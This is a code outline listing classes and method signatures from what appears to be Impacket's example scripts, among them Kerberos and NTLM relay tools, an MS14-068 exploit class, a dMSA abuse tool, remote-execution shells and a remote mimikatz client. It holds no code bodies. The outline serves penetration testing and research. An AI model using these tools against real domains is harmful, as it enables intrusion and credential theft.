method __init__ (line 46) | def __init__(self, username='', password='', domain='', hashes=None, a...
method play (line 63) | def play(self, addr):
method doStuff (line 82) | def doStuff(self, rpctransport):
FILE: examples/attrib.py
class FileAttributes (line 78) | class FileAttributes:
method pack (line 99) | def pack(self) -> int:
method unpack (line 122) | def unpack(cls, data: int) -> FileAttributes:
method repr_attribs (line 146) | def repr_attribs(data: int) -> str:
method __repr__ (line 149) | def __repr__(self) -> str:
function attrib_query (line 166) | def attrib_query(connection: smbconnection.SMBConnection, tid: int, fid:...
function attrib_set (line 177) | def attrib_set(connection: smbconnection.SMBConnection, tid: int, fid: i...
function main (line 200) | def main():
FILE: examples/badsuccessor.py
class BADSUCCESSOR (line 37) | class BADSUCCESSOR:
method __init__ (line 38) | def __init__(self, username, password, domain, lmhash, nthash, cmdLine...
method run (line 82) | def run(self):
method delete_dmsa (line 140) | def delete_dmsa(self, ldapConnection):
method check_account_exists (line 172) | def check_account_exists(self, ldapConnection, dn):
method search_ous (line 188) | def search_ous(self, ldapConnection):
method is_excluded_sid (line 347) | def is_excluded_sid(self, sid, domain_sid):
method resolve_sid_to_name (line 361) | def resolve_sid_to_name(self, ldapConnection, sid):
method generate_dmsa_name (line 402) | def generate_dmsa_name(self):
method convert_sid_to_string (line 406) | def convert_sid_to_string(self, sid_bytes):
method build_security_descriptor (line 446) | def build_security_descriptor(self, user_sid):
method add_dmsa (line 502) | def add_dmsa(self, ldapConnection):
method modify_dmsa (line 606) | def modify_dmsa(self, ldapConnection):
FILE: examples/changepasswd.py
class PasswordHandler (line 137) | class PasswordHandler:
method __init__ (line 140) | def __init__(
method _changePassword (line 177) | def _changePassword(
method changePassword (line 183) | def changePassword(
method _setPassword (line 227) | def _setPassword(self, targetUsername, targetDomain, newPassword, newP...
method setPassword (line 231) | def setPassword(self, targetUsername, targetDomain=None, newPassword="...
class KPassword (line 251) | class KPassword(PasswordHandler):
method _changePassword (line 254) | def _changePassword(
method _setPassword (line 295) | def _setPassword(self, targetUsername, targetDomain, newPassword, newP...
class SamrPassword (line 321) | class SamrPassword(PasswordHandler):
method rpctransport (line 328) | def rpctransport(self):
method authenticate (line 336) | def authenticate(self, anonymous=False):
method connect (line 377) | def connect(self, retry_if_expired=False):
method hSamrOpenUser (line 426) | def hSamrOpenUser(self, username):
method _SamrWrapper (line 458) | def _SamrWrapper(self, samrProcedure, *args, _change=True, **kwargs):
method hSamrUnicodeChangePasswordUser2 (line 496) | def hSamrUnicodeChangePasswordUser2(
method hSamrChangePasswordUser (line 510) | def hSamrChangePasswordUser(
method hSamrSetInformationUser (line 528) | def hSamrSetInformationUser(self, username, newPassword, newPwdHashLM,...
method _changePassword (line 535) | def _changePassword(
method _setPassword (line 555) | def _setPassword(self, targetUsername, targetDomain, newPassword, newP...
class RpcPassword (line 566) | class RpcPassword(SamrPassword):
method rpctransport (line 567) | def rpctransport(self):
method _changePassword (line 573) | def _changePassword(
method _setPassword (line 584) | def _setPassword(self, targetUsername, targetDomain, newPassword, newP...
class SmbPassword (line 591) | class SmbPassword(SamrPassword):
method rpctransport (line 592) | def rpctransport(self):
class LdapPassword (line 596) | class LdapPassword(PasswordHandler):
method connect (line 602) | def connect(self, targetDomain):
method encodeLdapPassword (line 633) | def encodeLdapPassword(self, password):
method findTargetDN (line 641) | def findTargetDN(self, targetUsername, targetDomain):
method _modifyPassword (line 658) | def _modifyPassword(self, change, targetUsername, targetDomain, oldPas...
method _changePassword (line 711) | def _changePassword(
method _setPassword (line 729) | def _setPassword(self, targetUsername, targetDomain, newPassword, newP...
function parse_args (line 743) | def parse_args():
FILE: examples/dacledit.py
class RIGHTS_GUID (line 132) | class RIGHTS_GUID(Enum):
class ACE_FLAGS (line 142) | class ACE_FLAGS(Enum):
class OBJECT_ACE_FLAGS (line 156) | class OBJECT_ACE_FLAGS(Enum):
class ACCESS_MASK (line 165) | class ACCESS_MASK(Enum):
class SIMPLE_PERMISSIONS (line 200) | class SIMPLE_PERMISSIONS(Enum):
class ALLOWED_OBJECT_ACE_MASK_FLAGS (line 213) | class ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):
class DACLedit (line 222) | class DACLedit(object):
method __init__ (line 225) | def __init__(self, ldap_server, ldap_session, args):
method read (line 292) | def read(self):
method write (line 300) | def write(self):
method remove (line 322) | def remove(self):
method backup (line 380) | def backup(self):
method restore (line 396) | def restore(self):
method search_target_principal_security_descriptor (line 419) | def search_target_principal_security_descriptor(self):
method get_user_info (line 443) | def get_user_info(self, samname):
method resolveSID (line 456) | def resolveSID(self, sid):
method parseDACL (line 474) | def parseDACL(self, dacl):
method parsePerms (line 488) | def parsePerms(self, fsr):
method parseACE (line 502) | def parseACE(self, ace):
method printparsedDACL (line 567) | def printparsedDACL(self, parsed_dacl):
method printparsedACE (line 604) | def printparsedACE(self, parsed_ace):
method build_guids_for_rights (line 611) | def build_guids_for_rights(self):
method modify_secDesc_for_dn (line 629) | def modify_secDesc_for_dn(self, dn, secDesc):
method create_ace (line 652) | def create_ace(self, access_mask, sid, ace_type):
method create_object_ace (line 679) | def create_object_ace(self, privguid, sid, ace_type, force_mask=None):
function parse_args (line 715) | def parse_args():
function main (line 757) | def main():
FILE: examples/dcomexec.py
class DCOMEXEC (line 67) | class DCOMEXEC:
method __init__ (line 68) | def __init__(self, command='', username='', password='', domain='', ha...
method getInterface (line 87) | def getInterface(self, interface, resp):
method run (line 107) | def run(self, addr, silentCommand=False):
class RemoteShell (line 208) | class RemoteShell(cmd.Cmd):
method __init__ (line 209) | def __init__(self, share, quit, executeShellCommand, smbConnection, sh...
method do_shell (line 232) | def do_shell(self, s):
method do_help (line 235) | def do_help(self, line):
method do_lcd (line 244) | def do_lcd(self, s):
method do_lget (line 253) | def do_lget(self, src_path):
method do_lput (line 268) | def do_lput(self, s):
method do_exit (line 291) | def do_exit(self, s):
method do_EOF (line 302) | def do_EOF(self, s):
method emptyline (line 306) | def emptyline(self):
method do_cd (line 309) | def do_cd(self, s):
method default (line 326) | def default(self, line):
method get_output (line 348) | def get_output(self):
method execute_remote (line 378) | def execute_remote(self, data, shell_type='cmd'):
method send_data (line 441) | def send_data(self, data):
class RemoteShellMMC20 (line 446) | class RemoteShellMMC20(RemoteShell):
method execute_remote (line 447) | def execute_remote(self, data, shell_type='cmd'):
class AuthFileSyntaxError (line 499) | class AuthFileSyntaxError(Exception):
method __init__ (line 504) | def __init__(self, path, lineno, reason):
method __str__ (line 509) | def __str__(self):
function load_smbclient_auth_file (line 513) | def load_smbclient_auth_file(path):
FILE: examples/describeTicket.py
class User_Flags (line 46) | class User_Flags(Enum):
class SE_GROUP_Attributes (line 51) | class SE_GROUP_Attributes(Enum):
class USER_ACCOUNT_Codes (line 57) | class USER_ACCOUNT_Codes(Enum):
class UF_FLAG_Codes (line 82) | class UF_FLAG_Codes(Enum):
class Upn_Dns_Flags (line 109) | class Upn_Dns_Flags(Enum):
class Attributes_Flags (line 114) | class Attributes_Flags(Enum):
function parse_ccache (line 220) | def parse_ccache(args):
function parse_pac (line 357) | def parse_pac(pacType, args):
function kerberoast_from_ccache (line 634) | def kerberoast_from_ccache(decodedTGS, spn, username, domain):
function parse_args (line 677) | def parse_args():
function main (line 722) | def main():
FILE: examples/dpapi.py
class DPAPI (line 67) | class DPAPI:
method __init__ (line 68) | def __init__(self, options):
method getDPAPI_SYSTEM (line 73) | def getDPAPI_SYSTEM(self,secretType, secret):
method getLSA (line 81) | def getLSA(self):
method run (line 94) | def run(self):
FILE: examples/esentutl.py
function dumpPage (line 33) | def dumpPage(ese, pageNum):
function exportTable (line 37) | def exportTable(ese, tableName):
function main (line 61) | def main():
FILE: examples/exchanger.py
class Exchanger (line 64) | class Exchanger:
method __init__ (line 65) | def __init__(self):
method conenct_mapi (line 81) | def conenct_mapi(self):
method connect_rpc (line 84) | def connect_rpc(self):
method load_autodiscover (line 87) | def load_autodiscover(self):
method set_credentials (line 93) | def set_credentials(self, username='', password='', domain='', hashes=...
method set_extended_output (line 103) | def set_extended_output(self, output_mode):
method set_output_type (line 106) | def set_output_type(self, output_type):
method set_output_file (line 109) | def set_output_file(self, filename):
method print (line 113) | def print(self, text):
method _encode_binary (line 121) | def _encode_binary(self, bytestr):
method __del__ (line 131) | def __del__(self):
class NSPIAttacks (line 136) | class NSPIAttacks(Exchanger):
method __init__ (line 232) | def __init__(self):
method connect_rpc (line 244) | def connect_rpc(self, remoteName, rpcHostname=''):
method update_stat (line 273) | def update_stat(self, table_MId):
method load_htable (line 281) | def load_htable(self):
method load_htable_stat (line 287) | def load_htable_stat(self):
method load_htable_containerid (line 293) | def load_htable_containerid(self):
method _parse_and_set_htable (line 307) | def _parse_and_set_htable(self, htable):
method _int_to_dword (line 336) | def _int_to_dword(number):
method print_htable (line 342) | def print_htable(self, parent_guid=None):
method disconnect (line 407) | def disconnect(self):
method print_row (line 411) | def print_row(self, row_simpl, delimiter=None):
method load_props (line 448) | def load_props(self):
method req_print_table_rows (line 464) | def req_print_table_rows(self, table_MId=None, attrs=[], count=50, eTa...
method req_print_guid (line 608) | def req_print_guid(self, guid=None, attrs=[], count=50, guidFile=None):
method _req_print_guid (line 654) | def _req_print_guid(self, guidList, attrs, delimiter=None):
method req_print_dnt (line 685) | def req_print_dnt(self, start_dnt, stop_dnt, attrs=[], count=50, check...
class ExchangerHelper (line 722) | class ExchangerHelper:
method __init__ (line 723) | def __init__(self, domain, username, password, remoteName):
method run (line 731) | def run(self, options):
method nspi_run (line 742) | def nspi_run(self, submodule, options):
method nspi_check (line 763) | def nspi_check(self, submodule, options):
method nspi_list_tables (line 780) | def nspi_list_tables(self, options):
method nspi_dump_tables (line 788) | def nspi_dump_tables(self, options):
method nspi_guid_known (line 850) | def nspi_guid_known(self, options):
method nspi_dnt_lookup (line 866) | def nspi_dnt_lookup(self, options):
class SmartFormatter (line 887) | class SmartFormatter(argparse.HelpFormatter):
method _split_lines (line 888) | def _split_lines(self, text, width):
function localized_arg (line 894) | def localized_arg(bytestring):
FILE: examples/filetime.py
class FileTimes (line 68) | class FileTimes:
method pretty_repr (line 74) | def pretty_repr(self):
function filetime_query (line 87) | def filetime_query(connection: smbconnection.SMBConnection, tid: int, fi...
function filetime_set (line 103) | def filetime_set(connection: smbconnection.SMBConnection, tid: int, fid:...
function main (line 122) | def main():
FILE: examples/findDelegation.py
function checkIfSPNExists (line 39) | def checkIfSPNExists(ldapConnection, sAMAccountName, rights):
class FindDelegation (line 61) | class FindDelegation:
method printTable (line 63) | def printTable(items, header):
method __init__ (line 79) | def __init__(self, username, password, user_domain, target_domain, cmd...
method run (line 112) | def run(self):
FILE: examples/getArch.py
class TARGETARCH (line 41) | class TARGETARCH:
method __init__ (line 42) | def __init__(self, options):
method run (line 47) | def run(self):
FILE: examples/getPac.py
class S4U2SELF (line 55) | class S4U2SELF:
method printPac (line 57) | def printPac(self, data):
method __init__ (line 111) | def __init__(self, behalfUser, username = '', password = '', domain=''...
method dump (line 121) | def dump(self):
FILE: examples/getST.py
class GETST (line 83) | class GETST:
method __init__ (line 84) | def __init__(self, target, password, domain, options):
method saveTicket (line 101) | def saveTicket(self, ticket, sessionKey):
method doS4U2ProxyWithAdditionalTicket (line 175) | def doS4U2ProxyWithAdditionalTicket(self, tgt, cipher, oldSessionKey, ...
method doS4U (line 365) | def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey...
method run (line 781) | def run(self):
FILE: examples/getTGT.py
class GETTGT (line 37) | class GETTGT:
method __init__ (line 38) | def __init__(self, target, password, domain, options):
method saveTicket (line 51) | def saveTicket(self, ticket, sessionKey):
method run (line 59) | def run(self):
FILE: examples/goldenPac.py
class RemComMessage (line 71) | class RemComMessage(Structure):
class RemComResponse (line 81) | class RemComResponse(Structure):
class PSEXEC (line 93) | class PSEXEC:
method __init__ (line 94) | def __init__(self, command, username, domain, smbConnection, TGS, copy...
method run (line 104) | def run(self, addr):
method openPipe (line 202) | def openPipe(self, s, tid, pipe, accessMask):
class Pipes (line 222) | class Pipes(Thread):
method __init__ (line 223) | def __init__(self, transport, pipe, permissions, TGS=None, share=None):
method connectPipe (line 237) | def connectPipe(self):
class RemoteStdOutPipe (line 255) | class RemoteStdOutPipe(Pipes):
method __init__ (line 256) | def __init__(self, transport, pipe, permisssions):
method run (line 259) | def run(self):
class RemoteStdErrPipe (line 282) | class RemoteStdErrPipe(Pipes):
method __init__ (line 283) | def __init__(self, transport, pipe, permisssions):
method run (line 286) | def run(self):
class RemoteShell (line 300) | class RemoteShell(cmd.Cmd):
method __init__ (line 301) | def __init__(self, server, port, credentials, tid, fid, TGS, share):
method connect_transferClient (line 314) | def connect_transferClient(self):
method do_help (line 320) | def do_help(self, line):
method do_shell (line 330) | def do_shell(self, s):
method do_get (line 334) | def do_get(self, src_path):
method do_put (line 351) | def do_put(self, s):
method do_lcd (line 380) | def do_lcd(self, s):
method emptyline (line 390) | def emptyline(self):
method default (line 394) | def default(self, line):
method send_data (line 400) | def send_data(self, data, hideOutput = True):
class RemoteStdInPipe (line 409) | class RemoteStdInPipe(Pipes):
method __init__ (line 410) | def __init__(self, transport, pipe, permisssions, TGS=None, share=None):
method run (line 413) | def run(self):
class MS14_068 (line 419) | class MS14_068:
class VALIDATION_INFO (line 425) | class VALIDATION_INFO(TypeSerialization1):
method __init__ (line 430) | def __init__(self, target, targetIp=None, username='', password='', do...
method getGoldenPAC (line 454) | def getGoldenPAC(self, authTime):
method getKerberosTGS (line 683) | def getKerberosTGS(self, serverName, domain, kdcHost, tgt, cipher, ses...
method getForestSid (line 796) | def getForestSid(self):
method getDomainControllers (line 839) | def getDomainControllers(self):
method getUserSID (line 880) | def getUserSID(self):
method exploit (line 903) | def exploit(self):
FILE: examples/karmaSMB.py
class KarmaSMBServer (line 79) | class KarmaSMBServer(Thread):
method __init__ (line 80) | def __init__(self, smb2Support = False):
method findFirst2 (line 152) | def findFirst2(self, connId, smbServer, recvPacket, parameters, data, ...
method smbComNtCreateAndX (line 224) | def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):
method queryPathInformation (line 277) | def queryPathInformation(self, connId, smbServer, recvPacket, paramete...
method smb2Read (line 323) | def smb2Read(self, connId, smbServer, recvPacket):
method smb2Close (line 329) | def smb2Close(self, connId, smbServer, recvPacket):
method smb2Create (line 337) | def smb2Create(self, connId, smbServer, recvPacket):
method smb2QueryDirectory (line 395) | def smb2QueryDirectory(self, connId, smbServer, recvPacket):
method smb2TreeConnect (line 444) | def smb2TreeConnect(self, connId, smbServer, recvPacket):
method smbComTreeConnectAndX (line 512) | def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPac...
method _start (line 580) | def _start(self):
method run (line 583) | def run(self):
method setDefaultFile (line 587) | def setDefaultFile(self, filename):
method setExtensionsConfig (line 590) | def setExtensionsConfig(self, filename):
FILE: examples/keylistattack.py
class KeyListDump (line 49) | class KeyListDump:
method __init__ (line 50) | def __init__(self, remoteName, username, password, domain, options, en...
method connect (line 75) | def connect(self):
method run (line 94) | def run(self):
method getAllDomainUsers (line 121) | def getAllDomainUsers(self):
FILE: examples/kintercept.py
function process_s4u2else_req (line 49) | def process_s4u2else_req(data, impostor):
function mod_tgs_rep_user (line 95) | def mod_tgs_rep_user(data, reply_user):
class InterceptConn (line 108) | class InterceptConn(asyncore.dispatcher):
method __init__ (line 109) | def __init__(self, conn=None):
method recv (line 118) | def recv(self, n):
method forward_data (line 135) | def forward_data(self, data):
method buffer_empty (line 138) | def buffer_empty(self):
method max_read_size (line 141) | def max_read_size(self):
method readable (line 145) | def readable(self):
method handle_read (line 150) | def handle_read(self):
method handle_eof (line 156) | def handle_eof(self):
method need_to_send_eof (line 160) | def need_to_send_eof(self):
method writable (line 165) | def writable(self):
method handle_write (line 170) | def handle_write(self):
method handle_close (line 183) | def handle_close(self):
function InterceptKRB5Tcp (line 189) | def InterceptKRB5Tcp(process_record_func, arg):
class InterceptConnFactory (line 220) | class InterceptConnFactory:
method __init__ (line 221) | def __init__(self, handler=None, arg=None):
method produce (line 225) | def produce(self):
class InterceptServer (line 233) | class InterceptServer(asyncore.dispatcher):
method __init__ (line 234) | def __init__(self, addr, target, icf1, icf2):
method intercept_conns (line 244) | def intercept_conns(self, conn):
method handle_accept (line 249) | def handle_accept(self):
function parse_args (line 264) | def parse_args():
FILE: examples/lookupsid.py
class LSALookupSid (line 38) | class LSALookupSid:
method __init__ (line 44) | def __init__(self, username='', password='', domain='', port = None,
method dump (line 59) | def dump(self, remoteName, remoteHost):
method __bruteForce (line 85) | def __bruteForce(self, rpctransport, maxRid):
FILE: examples/machine_role.py
class MachineRole (line 34) | class MachineRole:
method __init__ (line 51) | def __init__(self, username='', password='', domain='', hashes=None,
method print_info (line 66) | def print_info(self, remoteName, remoteHost):
method __authenticate (line 82) | def __authenticate(self, remoteName, remoteHost):
method __get_transport (line 90) | def __get_transport(self, remoteName, remoteHost):
method __fetch (line 105) | def __fetch(self, dce):
method __log_and_exit (line 117) | def __log_and_exit(self, error):
FILE: examples/mimikatz.py
class MimikatzShell (line 47) | class MimikatzShell(cmd.Cmd):
method __init__ (line 48) | def __init__(self, dce):
method emptyline (line 75) | def emptyline(self):
method precmd (line 78) | def precmd(self,line):
method default (line 83) | def default(self, line):
method onecmd (line 93) | def onecmd(self,s):
method do_exit (line 103) | def do_exit(self,line):
method do_shell (line 108) | def do_shell(self, line):
method do_help (line 113) | def do_help(self,line):
function main (line 116) | def main():
FILE: examples/mqtt_check.py
class MQTT_LOGIN (line 34) | class MQTT_LOGIN:
method __init__ (line 35) | def __init__(self, username, password, target, options):
method run (line 44) | def run(self):
FILE: examples/net.py
class LsaTranslator (line 49) | class LsaTranslator:
method __init__ (line 50) | def __init__(self, smbConnection):
method Connect (line 56) | def Connect(self):
method LookupName (line 63) | def LookupName(self, name):
method LookupSids (line 69) | def LookupSids(self, sid_list):
class SamrObject (line 76) | class SamrObject:
method __init__ (line 77) | def __init__(self, smbConnection):
method _connect (line 85) | def _connect(self):
method _get_user_sid (line 92) | def _get_user_sid(self, username):
method _resolve_sid (line 97) | def _resolve_sid(self, sid_list):
method _get_object_rid (line 102) | def _get_object_rid(self, domain_handle, object_name):
method _get_user_handle (line 107) | def _get_user_handle(self, domain_handle, username):
method _get_group_handle (line 112) | def _get_group_handle(self, domain_handle, alias_name):
method _get_alias_handle (line 117) | def _get_alias_handle(self, domain_handle, alias_name):
method _open_domain (line 122) | def _open_domain(self, builtin=False):
method _close_domain (line 127) | def _close_domain(self):
method __get_domain_handle (line 132) | def __get_domain_handle(self, builtin=False):
class User (line 141) | class User(SamrObject):
method __init__ (line 142) | def __init__(self, smbConnection):
method Enumerate (line 147) | def Enumerate(self):
method Query (line 159) | def Query(self, name):
method Create (line 198) | def Create(self, name, new_password, new_nt_hash=''):
method Remove (line 211) | def Remove(self, name):
method _hEnableAccount (line 219) | def _hEnableAccount(self, user_handle):
method _hDisableAccount (line 226) | def _hDisableAccount(self, user_handle):
method SetUserAccountControl (line 233) | def SetUserAccountControl(self, name, action):
class Computer (line 247) | class Computer(User):
method __init__ (line 248) | def __init__(self, smbConnection):
class Group (line 254) | class Group(SamrObject):
method Enumerate (line 255) | def Enumerate(self):
method Query (line 267) | def Query(self, group_name):
method Join (line 277) | def Join(self, group_name, username):
method UnJoin (line 286) | def UnJoin(self, group_name, username):
class Localgroup (line 296) | class Localgroup(Group):
method Enumerate (line 297) | def Enumerate(self):
method Query (line 309) | def Query(self, group_name):
method Join (line 319) | def Join(self, group_name, username):
method UnJoin (line 328) | def UnJoin(self, group_name, username):
class Net (line 338) | class Net:
method __init__ (line 339) | def __init__(self, domain, username, password, options):
method connect (line 355) | def connect(self, remoteName, remoteHost):
method disconnect (line 364) | def disconnect(self):
method run (line 368) | def run(self, remoteName, remoteHost):
method __getUnixTime (line 455) | def __getUnixTime(self, t):
method __get_time_string (line 460) | def __get_time_string(self, large_integer):
method __format_logon_hours (line 469) | def __format_logon_hours(self, s):
method __b2s (line 475) | def __b2s(self, b):
method __get_action_class (line 478) | def __get_action_class(self, action):
method __is_option_present (line 481) | def __is_option_present(self, options, option):
FILE: examples/netview.py
function checkMachines (line 78) | def checkMachines(machines, stopEvent, singlePass=False):
class USERENUM (line 113) | class USERENUM:
method __init__ (line 114) | def __init__(self, username='', password='', domain='', hashes=None, a...
method getDomainMachines (line 133) | def getDomainMachines(self):
method getTargets (line 184) | def getTargets(self):
method filterUsers (line 197) | def filterUsers(self):
method run (line 209) | def run(self):
method getSessions (line 279) | def getSessions(self, target):
method getLoggedIn (line 355) | def getLoggedIn(self, target):
method stop (line 435) | def stop(self):
FILE: examples/ntfs-read.py
class NTFS_BPB (line 133) | class NTFS_BPB(Structure):
class NTFS_EXTENDED_BPB (line 148) | class NTFS_EXTENDED_BPB(Structure):
class NTFS_BOOT_SECTOR (line 162) | class NTFS_BOOT_SECTOR(Structure):
class NTFS_MFT_RECORD (line 172) | class NTFS_MFT_RECORD(Structure):
class NTFS_ATTRIBUTE_RECORD (line 190) | class NTFS_ATTRIBUTE_RECORD(Structure):
class NTFS_ATTRIBUTE_RECORD_NON_RESIDENT (line 202) | class NTFS_ATTRIBUTE_RECORD_NON_RESIDENT(Structure):
class NTFS_ATTRIBUTE_RECORD_RESIDENT (line 215) | class NTFS_ATTRIBUTE_RECORD_RESIDENT(Structure):
class NTFS_FILE_NAME_ATTR (line 223) | class NTFS_FILE_NAME_ATTR(Structure):
class NTFS_STANDARD_INFORMATION (line 240) | class NTFS_STANDARD_INFORMATION(Structure):
class NTFS_INDEX_HEADER (line 249) | class NTFS_INDEX_HEADER(Structure):
class NTFS_INDEX_ROOT (line 258) | class NTFS_INDEX_ROOT(Structure):
class NTFS_INDEX_ALLOCATION (line 269) | class NTFS_INDEX_ALLOCATION(Structure):
class NTFS_INDEX_ENTRY_HEADER (line 279) | class NTFS_INDEX_ENTRY_HEADER(Structure):
class NTFS_INDEX_ENTRY (line 288) | class NTFS_INDEX_ENTRY(Structure):
class NTFS_DATA_RUN (line 298) | class NTFS_DATA_RUN(Structure):
class NTFS_ATTRIBUTE_LIST_ENTRY (line 306) | class NTFS_ATTRIBUTE_LIST_ENTRY(Structure):
function getUnixTime (line 317) | def getUnixTime(t):
class Attribute (line 323) | class Attribute:
method __init__ (line 324) | def __init__(self, iNode, data):
method getFlags (line 331) | def getFlags(self):
method getName (line 334) | def getName(self):
method isNonResident (line 337) | def isNonResident(self):
method dump (line 340) | def dump(self):
method getTotalSize (line 343) | def getTotalSize(self):
method getType (line 346) | def getType(self):
class AttributeResident (line 349) | class AttributeResident(Attribute):
method __init__ (line 350) | def __init__(self, iNode, data):
method dump (line 356) | def dump(self):
method getFlags (line 359) | def getFlags(self):
method getValue (line 362) | def getValue(self):
method read (line 365) | def read(self,offset,length):
method getDataSize (line 369) | def getDataSize(self):
class AttributeNonResident (line 372) | class AttributeNonResident(Attribute):
method __init__ (line 373) | def __init__(self, iNode, data):
method dump (line 386) | def dump(self):
method getDataSize (line 389) | def getDataSize(self):
method getValue (line 392) | def getValue(self):
method parseDataRuns (line 395) | def parseDataRuns(self):
method readClusters (line 448) | def readClusters(self, clusters, lcn):
method readVCN (line 462) | def readVCN(self, vcn, numOfClusters):
method read (line 497) | def read(self, offset, length):
class NonResidentDataAttribute (line 546) | class NonResidentDataAttribute(AttributeNonResident):
method _shift_runs (line 548) | def _shift_runs(cls, attr, start_vcn):
method _base_sizes (line 556) | def _base_sizes(cls, attr):
method _ensure_base (line 560) | def _ensure_base(cls, collected, base_attr, base_data_size, base_initi...
method _collect_extents (line 568) | def _collect_extents(cls, iNode, matches, attribute_name):
method __init__ (line 589) | def __init__(self, iNode, entries, attribute_name=None):
method _merge_extents_from_collected (line 629) | def _merge_extents_from_collected(self, collected, data_size, init_size):
class AttributeStandardInfo (line 650) | class AttributeStandardInfo:
method __init__ (line 651) | def __init__(self, attribute):
method getFileAttributes (line 656) | def getFileAttributes(self):
method getFileTime (line 659) | def getFileTime(self):
method dump (line 665) | def dump(self):
class AttributeFileName (line 668) | class AttributeFileName:
method __init__ (line 669) | def __init__(self, attribute):
method getFileNameType (line 674) | def getFileNameType(self):
method getFileAttributes (line 677) | def getFileAttributes(self):
method getFileName (line 680) | def getFileName(self):
method getFileSize (line 683) | def getFileSize(self):
method getFlags (line 686) | def getFlags(self):
method dump (line 689) | def dump(self):
class AttributeIndexAllocation (line 692) | class AttributeIndexAllocation:
method __init__ (line 693) | def __init__(self, attribute):
method dump (line 697) | def dump(self):
method read (line 702) | def read(self, offset, length):
class AttributeIndexRoot (line 706) | class AttributeIndexRoot:
method __init__ (line 707) | def __init__(self, attribute):
method parseIndexEntries (line 714) | def parseIndexEntries(self):
method dump (line 723) | def dump(self):
method getType (line 728) | def getType(self):
class IndexEntry (line 731) | class IndexEntry:
method __init__ (line 732) | def __init__(self, entry):
method isSubNode (line 735) | def isSubNode(self):
method isLastNode (line 738) | def isLastNode(self):
method getVCN (line 741) | def getVCN(self):
method getSize (line 744) | def getSize(self):
method getKey (line 747) | def getKey(self):
method getINodeNumber (line 750) | def getINodeNumber(self):
method dump (line 753) | def dump(self):
class AttributeListEntry (line 756) | class AttributeListEntry:
method __init__ (line 757) | def __init__(self, entry_data):
class AttributeList (line 773) | class AttributeList:
method __init__ (line 776) | def __init__(self, attribute):
method _parseEntries (line 781) | def _parseEntries(self):
method getEntries (line 803) | def getEntries(self):
class INODE (line 806) | class INODE:
method __init__ (line 807) | def __init__(self, NTFSVolume):
method isDirectory (line 823) | def isDirectory(self):
method isCompressed (line 826) | def isCompressed(self):
method isEncrypted (line 829) | def isEncrypted(self):
method isSparse (line 832) | def isSparse(self):
method displayName (line 835) | def displayName(self):
method getPrintableAttributes (line 843) | def getPrintableAttributes(self):
method parseAttributes (line 871) | def parseAttributes(self):
method searchAttribute (line 910) | def searchAttribute(self, attributeType, attributeName, findNext = Fal...
method PerformFixUp (line 968) | def PerformFixUp(self, record, buf, numSectors):
method parseIndexBlocks (line 1000) | def parseIndexBlocks(self, vcn):
method walkSubNodes (line 1021) | def walkSubNodes(self, vcn):
method walk (line 1045) | def walk(self):
method findFirstSubNode (line 1071) | def findFirstSubNode(self, vcn, toSearch):
method findFirst (line 1101) | def findFirst(self, fileName):
method getStream (line 1136) | def getStream(self, name):
class NTFS (line 1140) | class NTFS:
method __init__ (line 1141) | def __init__(self, volumeName):
method mountVolume (line 1154) | def mountVolume(self):
method readBootSector (line 1166) | def readBootSector(self):
method getINode (line 1190) | def getINode(self, iNodeNum):
class MiniShell (line 1228) | class MiniShell(cmd.Cmd):
method __init__ (line 1229) | def __init__(self, volume):
method emptyline (line 1242) | def emptyline(self):
method onecmd (line 1245) | def onecmd(self,s):
method do_exit (line 1255) | def do_exit(self,line):
method do_shell (line 1258) | def do_shell(self, line):
method do_help (line 1263) | def do_help(self,line):
method do_lcd (line 1276) | def do_lcd(self,line):
method do_cd (line 1283) | def do_cd(self, line):
method findPathName (line 1312) | def findPathName(self, pathName):
method do_pwd (line 1329) | def do_pwd(self,line):
method do_ls (line 1332) | def do_ls(self, line, display=True):
method complete_cd (line 1354) | def complete_cd(self, text, line, begidx, endidx):
method complete_cat (line 1357) | def complete_cat(self,text,line,begidx,endidx):
method complete_hexdump (line 1360) | def complete_hexdump(self,text,line,begidx,endidx):
method complete_get (line 1363) | def complete_get(self, text, line, begidx, endidx, include = 1):
method do_hexdump (line 1383) | def do_hexdump(self,line):
method do_cat (line 1386) | def do_cat(self, line, command=None):
method do_get (line 1427) | def do_get(self, line):
function main (line 1434) | def main():
FILE: examples/ntlmrelayx.py
class MiniShell (line 63) | class MiniShell(cmd.Cmd):
method __init__ (line 64) | def __init__(self, relayConfig, threads, api_address):
method printTable (line 76) | def printTable(items, header):
method emptyline (line 92) | def emptyline(self):
method do_targets (line 95) | def do_targets(self, line):
method do_finished_attacks (line 100) | def do_finished_attacks(self, line):
method do_socks (line 105) | def do_socks(self, line):
method do_startservers (line 156) | def do_startservers(self, line):
method do_stopservers (line 164) | def do_stopservers(self, line):
method do_exit (line 172) | def do_exit(self, line):
method do_EOF (line 176) | def do_EOF(self, line):
function start_servers (line 179) | def start_servers(options, threads):
function stop_servers (line 262) | def stop_servers(threads):
FILE: examples/owneredit.py
class OwnerEdit (line 114) | class OwnerEdit(object):
method __init__ (line 115) | def __init__(self, ldap_server, ldap_session, args):
method read (line 156) | def read(self):
method write (line 165) | def write(self):
method search_target_principal_security_descriptor (line 192) | def search_target_principal_security_descriptor(self):
method resolveSID (line 213) | def resolveSID(self, sid):
function parse_args (line 229) | def parse_args():
function main (line 266) | def main():
FILE: examples/psexec.py
class RemComMessage (line 45) | class RemComMessage(Structure):
class RemComResponse (line 55) | class RemComResponse(Structure):
class PSEXEC (line 67) | class PSEXEC:
method __init__ (line 68) | def __init__(self, command, path, exeFile, copyFile, port=445,
method run (line 89) | def run(self, remoteName, remoteHost):
method openPipe (line 102) | def openPipe(self, s, tid, pipe, accessMask):
method doStuff (line 121) | def doStuff(self, rpctransport):
class Pipes (line 226) | class Pipes(Thread):
method __init__ (line 227) | def __init__(self, transport, pipe, permissions, share=None):
method connectPipe (line 240) | def connectPipe(self):
class RemoteStdOutPipe (line 265) | class RemoteStdOutPipe(Pipes):
method __init__ (line 266) | def __init__(self, transport, pipe, permisssions):
method run (line 269) | def run(self):
class RemoteStdErrPipe (line 383) | class RemoteStdErrPipe(Pipes):
method __init__ (line 384) | def __init__(self, transport, pipe, permisssions):
method run (line 387) | def run(self):
class RemoteShell (line 471) | class RemoteShell(cmd.Cmd):
method __init__ (line 472) | def __init__(self, server, port, credentials, tid, fid, share, transpo...
method connect_transferClient (line 485) | def connect_transferClient(self):
